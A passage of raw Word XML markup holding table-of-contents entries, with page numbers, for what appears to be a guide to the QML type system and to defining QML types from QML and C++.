        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>37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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using JavaScript Files</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605138 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38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139" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The QML Type System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605139 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Basic Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605140 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605141 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39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42" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Object Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605142 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40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43" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605143 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Supported Basic Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605144 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Basic Types Provided By The QML Language</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605145 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Basic Types Provided By QML Modules</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605146 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Property Change Behavior for Basic Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605147 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>42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48" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Object Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605148 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Object Types from QML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605149 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605150" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Object Types through QML Documents</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605150 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605151" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Anonymous Types with Component</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605151 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605152" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Object Types from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605152 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605153" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining Object Types through QML Documents</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605153 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605154" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining an Object Type with a QML File</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605154 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</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55" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Importing Types Defined Outside the Current Directory</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605155 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Accessible Attributes of Custom Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605156 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Defining QML Types from C++</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605157 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Registering C++ Types with the QML Type System</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605158 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Registering an Instantiable Object Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605159 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="61"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605160" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
